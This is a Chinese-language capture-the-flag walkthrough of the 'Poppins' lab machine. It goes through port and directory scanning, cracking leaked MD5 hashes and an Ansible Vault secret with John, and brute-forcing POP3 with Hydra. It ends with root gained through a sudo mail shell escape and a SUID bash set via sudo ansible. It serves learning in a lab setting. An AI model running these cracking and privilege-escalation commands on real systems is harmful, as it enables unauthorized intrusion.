poppips-mazasec-wp #
端口扫描 #
nmap扫描: 发现110 995 邮件端口 -sV 版本探测 -sC 脚本扫描
└─# nmap 172.20.10.2 -sV -sC
Starting Nmap 7.92 ( https://nmap.org ) at 2025-09-03 02:47 EDT
Nmap scan report for interstellar.dsz (172.20.10.2)
Host is up (0.000066s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: Mary Poppins - A Timeless Classic
|_http-server-header: Apache/2.4.62 (Debian)
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES UIDL SASL(PLAIN) AUTH-RESP-CODE USER PIPELINING TOP STLS CAPA
| ssl-cert: Subject: commonName=PyCrt.PyCrt
| Subject Alternative Name: DNS:PyCrt.PyCrt
| Not valid before: 2025-04-01T14:05:29
|_Not valid after: 2035-03-30T14:05:29
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: USER SASL(PLAIN) RESP-CODES UIDL CAPA TOP AUTH-RESP-CODE PIPELINING
| ssl-cert: Subject: commonName=PyCrt.PyCrt
| Subject Alternative Name: DNS:PyCrt.PyCrt
| Not valid before: 2025-04-01T14:05:29
|_Not valid after: 2035-03-30T14:05:29
|_ssl-date: TLS randomness does not represent time
MAC Address: 08:00:27:B7:B0:C2 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.47 seconds
没发现什么特别的
目录扫描 #
我们Dirsearch下
[02:49:32] Starting:
[02:49:32] 403 - 276B - /.ht_wsr.txt
[02:49:32] 403 - 276B - /.htaccess.bak1
[02:49:32] 403 - 276B - /.htaccess.sample
[02:49:32] 403 - 276B - /.htaccess.orig
[02:49:32] 403 - 276B - /.htaccess.save
[02:49:32] 403 - 276B - /.htaccess_sc
[02:49:32] 403 - 276B - /.htaccess_extra
[02:49:32] 403 - 276B - /.htaccess_orig
[02:49:32] 403 - 276B - /.htaccessOLD
[02:49:32] 403 - 276B - /.htaccessBAK
[02:49:32] 403 - 276B - /.htaccessOLD2
[02:49:32] 403 - 276B - /.htm
[02:49:32] 403 - 276B - /.html
[02:49:32] 403 - 276B - /.htpasswds
[02:49:32] 403 - 276B - /.htpasswd_test
[02:49:32] 403 - 276B - /.httr-oauth
[02:49:33] 403 - 276B - /.php
[02:49:50] 301 - 306B - /s -> http://172.20.10.2/s/ 注意这里有一个s 一般这时候看出来是嵌套的URL 就用dirb自动深度探测
[02:49:50] 403 - 276B - /server-status/
[02:49:50] 403 - 276B - /server-status
Dirb探测
dirb http://172.20.10.2 -w /root/zidianjiheinkali/dir/directory-list-2.3-medium.txt
xxxxx省略下
---- Entering directory: http://172.20.10.2/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/ ----
==> DIRECTORY: http://172.20.10.2/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/
---- Entering directory: http://172.20.10.2/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/ ----
==> DIRECTORY: http://172.20.10.2/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/
---- Entering directory: http://172.20.10.2/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/ ----
+ http://172.20.10.2/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/index.html
访问index发现提示注意备份我们就扫描文件后缀就行
gobuster dir -u http://172.20.10.2/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x html,bak,backup,old,~
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://172.20.10.2/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: bak,backup,old,~,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 276]
/index.html (Status: 200) [Size: 1531]
/hash.bak (Status: 200) [Size: 3300]
/.html (Status: 403) [Size: 276]
Progress: 1323360 / 1323366 (100.00%)
发现一个hash.bak 每行32位结果是md5用john来破解
xxxxxx
36038680b0a4dd318339c7d6f14e27d7
9128262fabd151136a4f5173c9f8b687
a16529ed27831262cbfb879bdb372813
c3c016a1ded2e9139566365156ac0e10
2118c709cb65868d19cc0eb70a1fd603
1a4d5a0bd8e7ae4c52b75116e261ff53
2ce6a8451b97c9fbf126feaabc020cfe
df5f5384aad29a7fd6530a00007c2321
18e117c28e23c72258ed6b586c64d79a
xxx
用john来破解要指定是Md5
john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 100 password hashes with no different salts (Raw-MD5 [MD5 512/512 AVX512BW 16x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
kent12 (?)
amotejoel (?)
sunjoo (?)
iydgmvin (?)
elised (?)
530223 (?)
viking35 (?)
naughtycat (?)
shadow626 (?)
middelweg (?)
eloscar (?)
cash1407 (?)
carlosmoya (?)
xytyx1972 (?)
vanity17 (?)
v0nowns. (?)
teadorohector (?)
taroh527 (?)
susancliford (?)
suicida*02 (?)
snoopymai12277++ (?)
xxxxxxx
清理出其他符号放到文件里面来爆破邮件端口 因为SSH爆破不了只能密钥登录-收集下主页这些用户名
爆破POP #
hydra -L user.txt -P password.txt pop3://172.20.10.2:110 -V -I -f -u -t 64 -e nsr
xxxxx
[110][pop3] host: 172.20.10.2 login: Bert password: jmac92777 登录上去
telnet登录pop查看邮件
──(root㉿kali)-[~] USER 用户名 PASS 密码 LIST 查看全部邮件 RETR 数字 选中查看
└─# telnet 172.20.10.2 110
Trying 172.20.10.2...
Connected to 172.20.10.2.
Escape character is '^]'.
+OK Dovecot (Debian) ready
USER Bert
+OK
PASS jmac92777
+OK Logged in.
LIST
+OK 1 messages:
1 1517
.
RETR 1
+OK 1517 octets
Return-path: <jane@poppins>
Envelope-to: bert@poppins
Delivery-date: Fri, 29 Aug 2025 06:33:49 -0400
Received: from jane by Poppins with local (Exim 4.94.2)
(envelope-from <jane@poppins>)
id 1urwQW-0001RQ-CD
for bert@poppins; Fri, 29 Aug 2025 06:33:48 -0400
To: bert@poppins
Subject: Urgent: Prod Server Credentials for Ansible Playbook
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1urwQW-0001RQ-CD@Poppins>
From: jane@poppins
Date: Fri, 29 Aug 2025 06:33:48 -0400
Hi Bert,
I've just finished the new Ansible playbook for the a-27 software deployment on our main production server, `web01.poppins.dsz`. It's ready to go.
The playbook contains some sensitive API keys, so I've encrypted the variables using Ansible Vault. You'll need to use the `ansible-vault decrypt` command to run it.
Here is the vault string you'll need to paste into the `secrets.yml` file.
```
$ANSIBLE_VAULT;1.1;AES256
66626631636362303332633238373338386634373434646532656534323230333938303331663630
3236333934663930343263363831353138323630393134320a366366393939373636386538336336
34353536656637313762323832643339633234656635326137633439303730373335386536306436
6335363366376634630a326563623737626337353436323565643365333061663661396337613731
3730
```
Let me know if you hit any issues. We need to get this deployed by EOD.
Thanks,
Jane
解密ANSIBLE密钥 #
发现一个ANSIBLE密钥 使用ansible2john.py 传为HASH来破解
JohnTheRipper/run/ansible2john.py at bleeding-jumbo · big-main/JohnTheRipper
python3 ansible2john.py secert.yml
secert.yml:$ansible$0*0*fbf1ccb032c287388f4744de2ee4220398031f6026394f9042c6815182609142*2ecb77bc754625ed3e30af6a9c7a7170*6cf9997668e83c64556ef717b282d39c24ef52a7c490707358e60d6c563f7f4c
john --wordlist=/usr/share/wordlists/rockyou.txt secert.yml
secert.yml:javiel 密码为javiel 然后使用
使用 ansible-vault解密 得到密码cumibug 这个工具对python环境有要求可以开启一个虚拟环境
激活环境
python3.12 -m venv ansible-env
/root/ansible-env/bin/activate
退出deactivate
└─# ansible-vault decrypt secert.yml
Vault password:
Decryption successful
┌──(ansible-env)─(root㉿kali)-[~/ansible-env]
└─# cat secert.yml
cumibug
┌──(ansibl
这时候卡了不知道干嘛的 前面还得到了一个用户因为其他用户他不识别你的密码,但是这个用户他识别
提权主要用户 #
ssh jane@172.20.10.2 密码javiel 这个用户sudo -l没有 -
su michael 密码就是 cumibug sudo -l 有 (winifred) PASSWD: /usr/bin/mail * 输入自己的密码就可以执行这个不是需要这个用户密码
提权:到winifred用户
sudo -u winifred /usr/bin/mail -f /etc/passwd
michael@Poppins:~$ sudo -u winifred /usr/bin/mail -f /etc/passwd
Mail version 8.1.2 01/15/2001. Type ? for help.
"/etc/passwd": 0 messages [Read only]
&
& whoami
Unknown command: "whoami"
& !/bin/bash
winifred@Poppins:/home/michael$ whoami
winifred
winifred@Poppins:/home/michael$ sudo -l
Matching Defaults entries for winifred on Poppins:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User winifred may run the following commands on Poppins:
(ALL) NOPASSWD: /usr/bin/ansible *
winifred@Poppins:/home/michael$ pwd
提权根用户 #
它可以用ansible
ansible 是运维的软件
sudo /usr/bin/ansible localhost -c local -m command -a “chmod +s /bin/bash” 执行命令
winifred@Poppins:~$ sudo /usr/bin/ansible localhost -c local -m command -a "chmod +s /bin/bash"
[WARNING]: No inventory was parsed, only implicit localhost is available
[WARNING]: Consider using the file module with mode rather than running 'chmod'. If you need to use comman
because file is insufficient you can add 'warn: false' to this command task or set 'command_warnings=False'
in ansible.cfg to get rid of this message.
localhost | CHANGED | rc=0 >>
winifred@Poppins:~$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /bin/bash
winifred@Poppins:~$ /bin/bash -p
bash-5.0# whoami
root
bash-5.0# cat /root/root.txt
learning #
1.备份文件后缀 html,bak,backup,old,~
2.ansible2john.py john破解密码
3.指定md5破解 john --format=raw-md5 –wordlist=/usr/share/wordlists/rockyou.txt hash
4.渗透中的用户名收集 密码收集